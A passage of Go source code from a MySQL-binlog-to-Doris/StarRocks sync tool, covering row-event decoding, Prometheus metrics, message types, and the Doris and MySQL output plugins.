failed, err: %v", err.Error()) 370 | } 371 | if len(row) != len(ta.Columns) { 372 | log.Warnf("update %s.%s columns and data mismatch in local length: %d vs %d, table %v", 373 | e.Table.Schema, e.Table.Name, len(ta.Columns), len(row), ta.GetTableColumnsName()) 374 | } 375 | for j := 0; j < len(row); j++ { 376 | data[ta.Columns[j].Name] = deserializeForLocal(row[j], ta.Columns[j]) 377 | old[ta.Columns[j].Name] = deserializeForLocal(e.Rows[i-1][j], ta.Columns[j]) 378 | } 379 | } else { 380 | for j := 0; j < len(row); j++ { 381 | data[e.Table.Columns[j].Name] = deserialize(row[j], e.Table.Columns[j]) 382 | old[e.Table.Columns[j].Name] = deserialize(e.Rows[i-1][j], e.Table.Columns[j]) 383 | } 384 | } 385 | 386 | log.Debugf("msg event: %s %s.%s %v\n", e.Action, e.Table.Schema, e.Table.Name, data) 387 | msgs = append(msgs, &msg.Msg{ 388 | Table: e.Table.Name, 389 | Database: e.Table.Schema, 390 | Type: msg.MsgDML, 391 | DmlMsg: &msg.DMLMsg{Action: msg.UpdateAction, Data: data}, 392 | Timestamp: time.Unix(int64(e.Header.Timestamp), 0), 393 | PluginName: msg.MysqlPlugin, 394 | }) 395 | } 396 | return msgs 397 | } 398 | if e.Action == canal.DeleteAction { 399 | for _, row := range e.Rows { 400 | data := make(map[string]interface{}) 401 | 402 | if len(row) != len(e.Table.Columns) { 403 | log.Warnf("delete %s.%s columns and data mismatch in length: %d vs %d", 404 | e.Table.Schema, e.Table.Name, len(e.Table.Columns), len(row)) 405 | log.Infof("load table:%s.%s meta columns from local", e.Table.Schema, e.Table.Name) 406 | ta, err := mi.inSchema.GetTable(e.Table.Schema, e.Table.Name) 407 | if err != nil { 408 | log.Fatalf("get tables failed, err: %v", err.Error()) 409 | } 410 | if len(row) != len(ta.Columns) { 411 | log.Warnf("delete %s.%s columns and data mismatch in local length: %d vs %d, table %v", 412 | e.Table.Schema, e.Table.Name, len(ta.Columns), len(row), ta.GetTableColumnsName()) 413 | } 414 | for j := 0; j < len(row); j++ { 415 | data[ta.Columns[j].Name] = deserializeForLocal(row[j], ta.Columns[j]) 416 | } 417 | } else { 418 | for j := 0; j < len(row); j++ { 419 | data[e.Table.Columns[j].Name] = deserialize(row[j], e.Table.Columns[j]) 420 | } 421 | } 422 | 423 | log.Debugf("msg event: %s %s.%s %v\n", e.Action, e.Table.Schema, e.Table.Name, data) 424 | msgs = append(msgs, &msg.Msg{ 425 | Table: e.Table.Name, 426 | Database: e.Table.Schema, 427 | Type: msg.MsgDML, 428 | DmlMsg: &msg.DMLMsg{Action: msg.DeleteAction, Data: data}, 429 | Timestamp: time.Unix(int64(e.Header.Timestamp), 0), 430 | PluginName: msg.MysqlPlugin, 431 | }) 432 | 433 | } 434 | return msgs 435 | } 436 | log.Fatalf("msg actionType: %s not found") 437 | return nil 438 | } 439 | 440 | func (mi *MysqlInputPlugin) AfterMsgCommit(msg *msg.Msg) error { 441 | ctx := msg.InputContext.(*inputContext) 442 | if ctx.BinlogGTID != "" { 443 | if err := mi.position.ModifyPosition(ctx.BinlogGTID); err != nil { 444 | return errors.Trace(err) 445 | } 446 | if ctx.force { 447 | // flush position 448 | if err := mi.position.SavePosition(); err != nil { 449 | log.Fatalf("msg event position save failed: %v", errors.ErrorStack(err)) 450 | } 451 | mi.ctlMsgFlushPosition.BinlogName = ctx.BinlogName 452 | mi.ctlMsgFlushPosition.BinlogPos = ctx.BinlogPos 453 | mi.ctlMsgFlushPosition.BinlogGTID = ctx.BinlogGTID 454 | } 455 | } else { 456 | log.Warnf("after msg commit binlog gtid is empty, no modify position! msg: %v", msg.InputContext) 457 | } 458 | 459 | return nil 460 | } 461 | 462 | func (mi *MysqlInputPlugin) promTimingMetrics() { 463 | mi.wg.Add(1) 464 | go func() { 465 | defer mi.wg.Done() 466 | ticker := time.NewTicker(time.Second * 3) 467 | defer ticker.Stop() 468 | 469 | for { 470 | select { 471 | case <-ticker.C: 472 | // prom sync delay set 473 | metrics.DelayReadTime.Set(float64(mi.canal.GetDelay())) 474 | case <-mi.ctx.Done(): 475 | return 476 | } 477 | } 478 | }() 479 | } 480 | -------------------------------------------------------------------------------- /pkg/input/utils.go: -------------------------------------------------------------------------------- 1 | package input 2 | 3 | import ( 4 | "github.com/go-mysql-org/go-mysql/schema" 5 | schema2 "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 6 | ) 7 | 8 | type inputContext struct { 9 | BinlogName string `toml:"binlog-name"` 10 | BinlogPos uint32 `toml:"binlog-pos"` 11 | BinlogGTID string `toml:"binlog-gtid"` 12 | force bool 13 | } 14 | 15 | func deserialize(raw interface{}, column schema.TableColumn) interface{} { 16 | if raw == nil { 17 | return nil 18 | } 19 | 20 | ret := raw 21 | if column.RawType == "text" || column.RawType == "longtext" || column.RawType == "mediumtext" || column.RawType == "json" { 22 | _, ok := raw.([]uint8) 23 | if ok { 24 | ret = string(raw.([]uint8)) 25 | } 26 | } 27 | return ret 28 | } 29 | 30 | func deserializeForLocal(raw interface{}, column schema2.TableColumn) interface{} { 31 | if raw == nil { 32 | return nil 33 | } 34 | 35 | ret := raw 36 | if column.RawType == "text" || column.RawType == "longtext" || column.RawType == "mediumtext" || column.RawType == "json" { 37 | _, ok := raw.([]uint8) 38 | if ok { 39 | ret = string(raw.([]uint8)) 40 | } 41 | } 42 | return ret 43 | } 44 | 45 | type node struct { 46 | db string 47 | table string 48 | newDb string 49 | newTable string 50 | } 51 | -------------------------------------------------------------------------------- /pkg/metrics/metrics.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/prometheus/client_golang/prometheus/promauto" 6 | ) 7 | 8 | var OpsStartTime = prometheus.NewGauge(prometheus.GaugeOpts{ 9 | Namespace: "go_mysql_sr", 10 | Subsystem: "start", 11 | Name: "time", 12 | Help: "go-mysql-sr startup timestamp(s).", 13 | }) 14 | 15 | var OpsReadProcessed = promauto.NewCounter(prometheus.CounterOpts{ 16 | Name: "go_mysql_sr_read_processed_ops_total", 17 | Help: "The total number of read processed events", 18 | }) 19 | 20 | var OpsWriteProcessed = promauto.NewCounter(prometheus.CounterOpts{ 21 | Name: "go_mysql_sr_write_processed_ops_total", 22 | Help: "The total number of write processed events", 23 | }) 24 | 25 | var DelayReadTime = prometheus.NewGauge(prometheus.GaugeOpts{ 26 | Namespace: "go_mysql_sr", 27 | Subsystem: "read_delay", 28 | Name: "time_seconds", 29 | Help: "Delay in seconds to read the binlog at the source.", 30 | }) 31 | 32 | var DelayWriteTime = prometheus.NewGauge(prometheus.GaugeOpts{ 33 | Namespace: "go_mysql_sr", 34 | Subsystem: "write_delay", 35 | Name: "time_seconds", 36 | Help: "Delay in seconds to write at the destination.", 37 | }) 38 | 39 | func init() { 40 | prometheus.MustRegister(OpsStartTime, DelayReadTime, DelayWriteTime) 41 | } 42 | -------------------------------------------------------------------------------- /pkg/msg/msg.go: -------------------------------------------------------------------------------- 1 | package msg 2 | 3 | import ( 4 | "github.com/pingcap/tidb/pkg/parser/ast" 5 | "time" 6 | ) 7 | 8 | type MsgType string 9 | type ActionType string 10 | type PluginName string 11 | 12 | const ( 13 | MsgDML MsgType = "dml" 14 | MsgDDL MsgType = "ddl" 15 | MsgCtl MsgType = "ctl" // control operate 16 | 17 | InsertAction ActionType = "insert" 18 | UpdateAction ActionType = "update" 19 | DeleteAction ActionType = "delete" 20 | ReplaceAction ActionType = "replace" 21 | 22 | MysqlPlugin PluginName = "Mysql" 23 | MongoPlugin PluginName = "Mongo" 24 | ) 25 | 26 | type Msg struct { 27 | Database string 28 | Table string 29 | Type MsgType 30 | DmlMsg *DMLMsg 31 | DdlMsg *DDLMsg 32 | PluginName PluginName 33 | ResumeToken *WatchId `bson:"_id"` 34 | Timestamp time.Time 35 | InputContext interface{} 36 | AfterCommitCallback MsgCallbackFunc 37 | } 38 | 39 | type DMLMsg struct { 40 | Action ActionType 41 | Data map[string]interface{} 42 | Old map[string]interface{} 43 | } 44 | 45 | type DDLMsg struct { 46 | Statement string 47 | AST ast.StmtNode 48 | } 49 | 50 | type WatchId struct { 51 | Data string `bson:"_data"` 52 | } 53 | 54 | type MsgCallbackFunc func(m *Msg) error 55 | -------------------------------------------------------------------------------- /pkg/output/op_doris.go: -------------------------------------------------------------------------------- 1 | package output 2 | 3 | import ( 4 | "context" 5 | "encoding/base64" 6 | "encoding/json" 7 | "fmt" 8 | "github.com/go-mysql-org/go-mysql/client" 9 | "github.com/go-mysql-org/go-mysql/mysql" 10 | "github.com/juju/errors" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 17 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 18 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 19 | "github.com/mitchellh/mapstructure" 20 | "github.com/siddontang/go-log/log" 21 | "io" 22 | "net/http" 23 | "strings" 24 | "sync" 25 | "time" 26 | ) 27 | 28 | type Doris struct { 29 | *config.DorisConfig 30 | tableLock sync.RWMutex 31 | tables map[string]*schema.Table 32 | ruleLock sync.RWMutex 33 | rulesMap map[string]*rule.DorisRule 34 | lastCtlMsg *msg.Msg 35 | syncTimestamp time.Time // sync chan中last event timestamp 36 | ackTimestamp time.Time // sync data ack的 event timestamp 37 | close bool 38 | connLock sync.Mutex 39 | conn *client.Conn 40 | inSchema core.Schema 41 | wg sync.WaitGroup 42 | ctx context.Context 43 | cancel context.CancelFunc 44 | pauseC chan bool 45 | resumeC chan bool 46 | paused bool 47 | } 48 | 49 | const DorisName = "doris" 50 | 51 | func init() { 52 | registry.RegisterPlugin(registry.OutputPlugin, DorisName, &Doris{}) 53 | } 54 | 55 | func (ds *Doris) Configure(pipelineName string, configOutput map[string]interface{}) error { 56 | ds.DorisConfig = &config.DorisConfig{} 57 | var target = configOutput["target"] 58 | err := mapstructure.Decode(target, ds.DorisConfig) 59 | if err != nil { 60 | log.Fatal("output.target config parsing failed. err: %v", err.Error()) 61 | } 62 | return nil 63 | } 64 | 65 | func (ds *Doris) NewOutput(outputConfig interface{}, rulesMap map[string]interface{}, inSchema core.Schema) { 66 | // init map obj 67 | ds.tables = make(map[string]*schema.Table) 68 | ds.rulesMap = make(map[string]*rule.DorisRule) 69 | 70 | ds.ctx, ds.cancel = context.WithCancel(context.Background()) 71 | 72 | ds.close = false 73 | ds.StartMetrics() 74 | var err error 75 | // init conn 76 | ds.conn, err = client.Connect(fmt.Sprintf("%s:%d", ds.Host, ds.Port), ds.UserName, ds.Password, "") 77 | if err != nil { 78 | log.Fatal("output config conn failed. err: ", err.Error()) 79 | } 80 | // init rulesMap 81 | if err = mapstructure.Decode(rulesMap, &ds.rulesMap); err != nil { 82 | log.Fatal(err) 83 | } 84 | ds.inSchema = inSchema 85 | ds.pauseC = make(chan bool, 1) 86 | ds.resumeC = make(chan bool, 1) 87 | ds.paused = false 88 | } 89 | 90 | func (ds *Doris) StartOutput(outputChan *channel.OutputChannel) { 91 | ds.wg.Add(1) 92 | 93 | ticker := time.NewTicker(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 94 | defer ticker.Stop() 95 | defer ds.wg.Done() 96 | 97 | eventsLen := 0 98 | schemaTableEvents := make(map[string][]*msg.Msg) 99 | for { 100 | needFlush := false 101 | select { 102 | case v := <-outputChan.SyncChan: 103 | switch data := v.(type) { 104 | case *msg.Msg: 105 | if data.Type == msg.MsgCtl { 106 | ds.lastCtlMsg = data 107 | continue 108 | } 109 | 110 | ds.syncTimestamp = data.Timestamp 111 | 112 | schemaTable := rule.RuleKeyFormat(data.Database, data.Table) 113 | rowsData, ok := schemaTableEvents[schemaTable] 114 | if !ok { 115 | schemaTableEvents[schemaTable] = make([]*msg.Msg, 0, outputChan.ChannelSize) 116 | } 117 | schemaTableEvents[schemaTable] = append(rowsData, data) 118 | eventsLen += 1 119 | 120 | if eventsLen >= outputChan.ChannelSize { 121 | needFlush = true 122 | } 123 | } 124 | case <-ds.ctx.Done(): 125 | needFlush = true 126 | log.Infof("wait last one flush output data...") 127 | ds.close = true 128 | case <-ticker.C: 129 | needFlush = true 130 | case <-ds.pauseC: 131 | ds.paused = true 132 | <-ds.resumeC 133 | select { 134 | default: 135 | ds.paused = false 136 | continue 137 | } 138 | } 139 | 140 | if needFlush { 141 | for schemaTable := range schemaTableEvents { 142 | ruleMap, ok := ds.rulesMap[schemaTable] 143 | if !ok { 144 | log.Fatalf("get ruleMap failed: %v", schemaTable) 145 | } 146 | tableObj, err := ds.inSchema.GetTable(ruleMap.SourceSchema, ruleMap.SourceTable) 147 | if err != nil { 148 | log.Fatal(err) 149 | } 150 | 151 | err = ds.Execute(schemaTableEvents[schemaTable], tableObj, ruleMap.TargetSchema, ruleMap.TargetTable) 152 | if err != nil { 153 | log.Fatalf("do doris bulk err %v, close sync", err) 154 | ds.cancel() 155 | return 156 | } 157 | delete(schemaTableEvents, schemaTable) 158 | } 159 | 160 | // only start lastCtlMsg is nil 161 | /*if ds.lastCtlMsg == nil { 162 | if ds.close { 163 | log.Infof("not found lastCtlMsg and output data, not last one flush.") 164 | return 165 | } else { 166 | continue 167 | } 168 | }*/ 169 | 170 | if ds.lastCtlMsg.AfterCommitCallback != nil { 171 | err := ds.lastCtlMsg.AfterCommitCallback(ds.lastCtlMsg) 172 | if err != nil { 173 | log.Fatalf("ack msg failed: %v", errors.ErrorStack(err)) 174 | } 175 | // log.Debugf("after commit callback lastCtl: %v", ds.lastCtlMsg.InputContext) 176 | } else { 177 | log.Fatalf("not found AfterCommitCallback func") 178 | } 179 | 180 | ds.ackTimestamp = ds.syncTimestamp 181 | eventsLen = 0 182 | // ticker.Reset(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 183 | if ds.close { 184 | log.Infof("last one flush output data done.") 185 | return 186 | } 187 | } 188 | } 189 | } 190 | 191 | func (ds *Doris) Execute(msgs []*msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 192 | if len(msgs) == 0 { 193 | return nil 194 | } 195 | var jsonList []string 196 | 197 | jsonList = ds.generateJSON(msgs, table) 198 | log.Debugf("doris bulk custom %s.%s row data num: %d", targetSchema, targetTable, len(jsonList)) 199 | for _, s := range jsonList { 200 | log.Debugf("doris custom %s.%s row data: %v", targetSchema, targetTable, s) 201 | } 202 | 203 | var err error 204 | for i := 0; i < RetryCount; i++ { 205 | err = ds.SendData(jsonList, table, targetSchema, targetTable, nil) 206 | if err != nil { 207 | log.Warnf("send data failed, err: %v, execute retry...", err.Error()) 208 | if i+1 == RetryCount { 209 | break 210 | } 211 | time.Sleep(time.Duration(RetryInterval*(i+1)) * time.Second) 212 | continue 213 | } 214 | break 215 | } 216 | return err 217 | } 218 | 219 | func (ds *Doris) Close() { 220 | ds.cancel() 221 | ds.connLock.Lock() 222 | err := ds.conn.Close() 223 | if err != nil { 224 | log.Fatalf("close doris output err: %v", err.Error()) 225 | } 226 | ds.conn = nil 227 | ds.connLock.Unlock() 228 | ds.wg.Wait() 229 | log.Infof("close doris output goroutine.") 230 | log.Infof("close doris output metrics goroutine.") 231 | } 232 | 233 | func (ds *Doris) AddRule(config map[string]interface{}) error { 234 | ds.ruleLock.Lock() 235 | defer ds.ruleLock.Unlock() 236 | dsr := &rule.DorisRule{Deleted: false} 237 | if err := mapstructure.Decode(config, dsr); err != nil { 238 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 239 | } 240 | // if exists, return 241 | ruleKey := rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable) 242 | for _, ruleObj := range ds.rulesMap { 243 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 244 | if ruleKey == tmpRuleKey { 245 | if ruleObj.Deleted { 246 | // if deleted is true, break, waiting to cover. 247 | break 248 | } 249 | return errors.New("output table rule already exists.") 250 | } 251 | } 252 | ds.rulesMap[rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable)] = dsr 253 | return nil 254 | } 255 | 256 | func (ds *Doris) DeleteRule(config map[string]interface{}) error { 257 | ds.ruleLock.Lock() 258 | defer ds.ruleLock.Unlock() 259 | dsr := &rule.DorisRule{} 260 | if err := mapstructure.Decode(config, dsr); err != nil { 261 | return errors.Trace(errors.New(fmt.Sprintf("delete rule config parsing failed. err: %v", err.Error()))) 262 | } 263 | // if exists delete 264 | ruleKey := rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable) 265 | for _, ruleObj := range ds.rulesMap { 266 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 267 | if ruleKey == tmpRuleKey { 268 | // delete(ds.rulesMap, ruleKey) 269 | // only mark deleted 270 | ds.rulesMap[ruleKey].Deleted = true 271 | return nil 272 | } 273 | } 274 | return errors.New("output table rule not exists.") 275 | } 276 | 277 | func (ds *Doris) GetRules() interface{} { 278 | return ds.rulesMap 279 | } 280 | 281 | func (ds *Doris) GetTable(db string, table string) (*schema.Table, error) { 282 | key := fmt.Sprintf("%s.%s", db, table) 283 | ds.tableLock.RLock() 284 | t, ok := ds.tables[key] 285 | ds.tableLock.RUnlock() 286 | if ok { 287 | return t, nil 288 | } 289 | 290 | r, err := ds.ExecuteSQL(fmt.Sprintf("show full columns from `%s`.`%s`", db, table)) 291 | if err != nil { 292 | return nil, err 293 | } 294 | ta := &schema.Table{ 295 | Schema: db, 296 | Name: table, 297 | Columns: make([]schema.TableColumn, 0, 16), 298 | } 299 | for i := 0; i < r.RowNumber(); i++ { 300 | name, _ := r.GetString(i, 0) 301 | ta.Columns = append(ta.Columns, schema.TableColumn{Name: name}) 302 | } 303 | ds.tableLock.Lock() 304 | ds.tables[key] = ta 305 | ds.tableLock.Unlock() 306 | return ta, nil 307 | } 308 | 309 | func (ds *Doris) generateJSON(msgs []*msg.Msg, table *schema.Table) []string { 310 | var jsonList []string 311 | 312 | for _, event := range msgs { 313 | // datetime 0000-00-00 00:00:00 write err handle 314 | err := ds.datetimeHandle(event, table) 315 | if err != nil { 316 | log.Fatalf("datetime type handle failed: %v", err.Error()) 317 | } 318 | 319 | switch event.DmlMsg.Action { 320 | case msg.InsertAction: 321 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 322 | event.DmlMsg.Data[DeleteColumn] = 0 323 | b, _ := json.Marshal(event.DmlMsg.Data) 324 | jsonList = append(jsonList, string(b)) 325 | case msg.UpdateAction: 326 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 327 | event.DmlMsg.Data[DeleteColumn] = 0 328 | b, _ := json.Marshal(event.DmlMsg.Data) 329 | jsonList = append(jsonList, string(b)) 330 | case msg.DeleteAction: // starrocks2.4版本只支持primary key模型load delete 331 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 332 | event.DmlMsg.Data[DeleteColumn] = 1 333 | b, _ := json.Marshal(event.DmlMsg.Data) 334 | jsonList = append(jsonList, string(b)) 335 | case msg.ReplaceAction: // for mongo 336 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 337 | event.DmlMsg.Data[DeleteColumn] = 0 338 | b, _ := json.Marshal(event.DmlMsg.Data) 339 | jsonList = append(jsonList, string(b)) 340 | default: 341 | log.Fatalf("unhandled message type: %v", event) 342 | } 343 | } 344 | return jsonList 345 | } 346 | 347 | func (ds *Doris) SendData(content []string, table *schema.Table, targetSchema string, targetTable string, ignoreColumns []string) error { 348 | cli := &http.Client{ 349 | /** CheckRedirect: func(req *http.Request, via []*http.Request) error { 350 | req.Header.Add("Authorization", "Basic "+sr.auth()) 351 | return nil // return nil nil回重定向。 352 | }, */ 353 | } 354 | loadUrl := fmt.Sprintf("http://%s:%d/api/%s/%s/_stream_load", 355 | ds.Host, ds.LoadPort, targetSchema, targetTable) 356 | newContent := `[` + strings.Join(content, ",") + `]` 357 | req, _ := http.NewRequest("PUT", loadUrl, strings.NewReader(newContent)) 358 | 359 | // req.Header.Add 360 | req.Header.Add("Authorization", "Basic "+ds.auth()) 361 | req.Header.Add("Expect", "100-continue") 362 | req.Header.Add("strict_mode", "true") 363 | // req.Header.Add("label", "39c25a5c-7000-496e-a98e-348a264c81de") 364 | req.Header.Add("format", "json") 365 | req.Header.Add("strip_outer_array", "true") 366 | req.Header.Add("merge_type", "MERGE") 367 | req.Header.Add("delete", DeleteCondition) 368 | var columnArray []string 369 | for _, column := range table.Columns { 370 | if ds.isContain(ignoreColumns, column.Name) { 371 | continue 372 | } 373 | columnArray = append(columnArray, column.Name) 374 | } 375 | columnArray = append(columnArray, DeleteColumn) 376 | columns := fmt.Sprintf("%s", strings.Join(columnArray, ",")) 377 | req.Header.Add("columns", columns) 378 | 379 | response, err := cli.Do(req) 380 | if err != nil { 381 | return errors.Trace(err) 382 | } 383 | returnMap, err := ds.parseResponse(response) 384 | if returnMap["Status"] != "Success" { 385 | message := returnMap["Message"] 386 | errorUrl := returnMap["ErrorURL"] 387 | errorMsg := message.(string) + 388 | fmt.Sprintf(", targetTable: %s.%s", targetSchema, targetTable) + 389 | fmt.Sprintf(", visit ErrorURL to view error details, ErrorURL: %s", errorUrl) 390 | return errors.Trace(errors.New(errorMsg)) 391 | } 392 | // prom write event number counter 393 | numberLoadedRows := returnMap["NumberLoadedRows"] 394 | metrics.OpsWriteProcessed.Add(numberLoadedRows.(float64)) 395 | return nil 396 | } 397 | 398 | func (ds *Doris) auth() string { 399 | s := ds.UserName + ":" + ds.Password 400 | b := []byte(s) 401 | 402 | sEnc := base64.StdEncoding.EncodeToString(b) 403 | return sEnc 404 | } 405 | 406 | func (ds *Doris) isContain(items []string, item string) bool { 407 | if len(items) == 0 { 408 | return false 409 | } 410 | for _, eachItem := range items { 411 | if eachItem == item { 412 | return true 413 | } 414 | } 415 | return false 416 | } 417 | 418 | func (ds *Doris) parseResponse(response *http.Response) (map[string]interface{}, error) { 419 | var result map[string]interface{} 420 | body, err := io.ReadAll(response.Body) 421 | if err == nil { 422 | err = json.Unmarshal(body, &result) 423 | } 424 | 425 | return result, err 426 | } 427 | 428 | func (ds *Doris) StartMetrics() { 429 | ds.promTimingMetrics() 430 | } 431 | 432 | func (ds *Doris) promTimingMetrics() { 433 | ds.wg.Add(1) 434 | go func() { 435 | defer ds.wg.Done() 436 | ticker := time.NewTicker(time.Second * 3) 437 | defer ticker.Stop() 438 | var newDelaySeconds uint32 439 | for { 440 | select { 441 | case <-ticker.C: 442 | // prom write delay set 443 | now := time.Now() 444 | if ds.syncTimestamp.IsZero() || ds.ackTimestamp.IsZero() || ds.syncTimestamp == ds.ackTimestamp { 445 | newDelaySeconds = 0 446 | } else { 447 | newDelaySeconds = uint32(now.Sub(ds.ackTimestamp).Seconds()) 448 | } 449 | // log.Debugf("write delay %vs", newDelay) 450 | metrics.DelayWriteTime.Set(float64(newDelaySeconds)) 451 | case <-ds.ctx.Done(): 452 | return 453 | } 454 | } 455 | }() 456 | } 457 | 458 | func (ds *Doris) ExecuteSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 459 | ds.connLock.Lock() 460 | defer ds.connLock.Unlock() 461 | argF := make([]func(*client.Conn), 0) 462 | retryNum := 3 463 | for i := 0; i < retryNum; i++ { 464 | if ds.conn == nil { 465 | ds.conn, err = client.Connect(fmt.Sprintf("%s:%d", ds.Host, ds.Port), ds.UserName, ds.Password, "", argF...) 466 | if err != nil { 467 | return nil, errors.Trace(err) 468 | } 469 | } 470 | 471 | rr, err = ds.conn.Execute(cmd, args...) 472 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 473 | return 474 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 475 | err := ds.conn.Close() 476 | if err != nil { 477 | return nil, err 478 | } 479 | ds.conn = nil 480 | continue 481 | } else { 482 | return 483 | } 484 | } 485 | return 486 | } 487 | 488 | func (ds *Doris) datetimeHandle(ev *msg.Msg, table *schema.Table) error { 489 | for _, column := range table.Columns { 490 | if column.Type == schema.TypeDatetime { 491 | if ev.DmlMsg.Data[column.Name] == "0000-00-00 00:00:00" { 492 | ev.DmlMsg.Data[column.Name] = "0000-01-01 00:00:00" 493 | } 494 | } 495 | } 496 | return nil 497 | } 498 | 499 | func (ds *Doris) Pause() error { 500 | ds.pauseC <- true 501 | return nil 502 | } 503 | 504 | func (ds *Doris) Resume() error { 505 | ds.resumeC <- true 506 | return nil 507 | } 508 | 509 | func (ds *Doris) IsPaused() bool { 510 | return ds.paused 511 | } 512 | -------------------------------------------------------------------------------- /pkg/output/op_mysql.go: -------------------------------------------------------------------------------- 1 | package output 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/go-mysql-org/go-mysql/client" 7 | "github.com/go-mysql-org/go-mysql/mysql" 8 | "github.com/juju/errors" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 17 | "github.com/mitchellh/mapstructure" 18 | "github.com/siddontang/go-log/log" 19 | "strings" 20 | "sync" 21 | "time" 22 | ) 23 | 24 | type Mysql struct { 25 | *config.MysqlConfig 26 | tableLock sync.RWMutex 27 | tables map[string]*schema.Table 28 | ruleLock sync.RWMutex 29 | rulesMap map[string]*rule.MysqlRule 30 | lastCtlMsg *msg.Msg 31 | syncTimestamp time.Time // sync chan中last event timestamp 32 | ackTimestamp time.Time // sync data ack的 event timestamp 33 | close bool 34 | connLock sync.Mutex 35 | conn *client.Conn 36 | inSchema core.Schema 37 | wg sync.WaitGroup 38 | ctx context.Context 39 | cancel context.CancelFunc 40 | pauseC chan bool 41 | resumeC chan bool 42 | paused bool 43 | } 44 | 45 | const MysqlName = "mysql" 46 | 47 | func init() { 48 | registry.RegisterPlugin(registry.OutputPlugin, MysqlName, &Mysql{}) 49 | } 50 | 51 | func (m *Mysql) Configure(pipelineName string, configOutput map[string]interface{}) error { 52 | m.MysqlConfig = &config.MysqlConfig{} 53 | var target = configOutput["target"] 54 | err := mapstructure.Decode(target, m.MysqlConfig) 55 | if err != nil { 56 | log.Fatal("output.target config parsing failed. err: %v", err.Error()) 57 | } 58 | return nil 59 | } 60 | 61 | func (m *Mysql) NewOutput(outputConfig interface{}, rulesMap map[string]interface{}, inSchema core.Schema) { 62 | // init map obj 63 | m.tables = make(map[string]*schema.Table) 64 | m.rulesMap = make(map[string]*rule.MysqlRule) 65 | 66 | m.ctx, m.cancel = context.WithCancel(context.Background()) 67 | 68 | m.close = false 69 | m.StartMetrics() 70 | var err error 71 | // init conn 72 | m.conn, err = client.Connect(fmt.Sprintf("%s:%d", m.Host, m.Port), m.UserName, m.Password, "") 73 | _ = m.conn.SetCharset("utf8mb4") 74 | if err != nil { 75 | log.Fatal("output config conn failed. err: ", err.Error()) 76 | } 77 | // init rulesMap 78 | if err = mapstructure.Decode(rulesMap, &m.rulesMap); err != nil { 79 | log.Fatal(err) 80 | } 81 | m.inSchema = inSchema 82 | m.pauseC = make(chan bool, 1) 83 | m.resumeC = make(chan bool, 1) 84 | m.paused = false 85 | } 86 | 87 | func (m *Mysql) StartOutput(outputChan *channel.OutputChannel) { 88 | m.wg.Add(1) 89 | 90 | ticker := time.NewTicker(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 91 | defer ticker.Stop() 92 | defer m.wg.Done() 93 | 94 | for { 95 | select { 96 | case v := <-outputChan.SyncChan: 97 | switch data := v.(type) { 98 | case *msg.Msg: 99 | if data.Type == msg.MsgCtl { 100 | m.lastCtlMsg = data 101 | continue 102 | } 103 | 104 | m.syncTimestamp = data.Timestamp 105 | 106 | schemaTable := rule.RuleKeyFormat(data.Database, data.Table) 107 | 108 | ruleMap, ok := m.rulesMap[schemaTable] 109 | if !ok { 110 | log.Fatalf("get ruleMap failed: %v", schemaTable) 111 | } 112 | tableObj, err := m.inSchema.GetTable(ruleMap.SourceSchema, ruleMap.SourceTable) 113 | if err != nil { 114 | log.Fatal(err) 115 | } 116 | err = m.RewriteExecute(data, tableObj, ruleMap.TargetSchema, ruleMap.TargetTable) 117 | if err != nil { 118 | log.Fatalf("do mysql sync err %v, close sync", err) 119 | m.cancel() 120 | return 121 | } 122 | } 123 | case <-m.ctx.Done(): 124 | m.close = true 125 | case <-ticker.C: 126 | case <-m.pauseC: 127 | m.paused = true 128 | <-m.resumeC 129 | select { 130 | default: 131 | m.paused = false 132 | continue 133 | } 134 | } 135 | // only start lastCtlMsg is nil 136 | if m.lastCtlMsg == nil { 137 | if m.close { 138 | log.Infof("not found lastCtlMsg and output data, not last one flush.") 139 | return 140 | } else { 141 | continue 142 | } 143 | } 144 | 145 | if m.lastCtlMsg.AfterCommitCallback != nil { 146 | err := m.lastCtlMsg.AfterCommitCallback(m.lastCtlMsg) 147 | if err != nil { 148 | log.Fatalf("ack msg failed: %v", errors.ErrorStack(err)) 149 | } 150 | // log.Debugf("after commit callback lastCtl: %v", m.lastCtlMsg.InputContext) 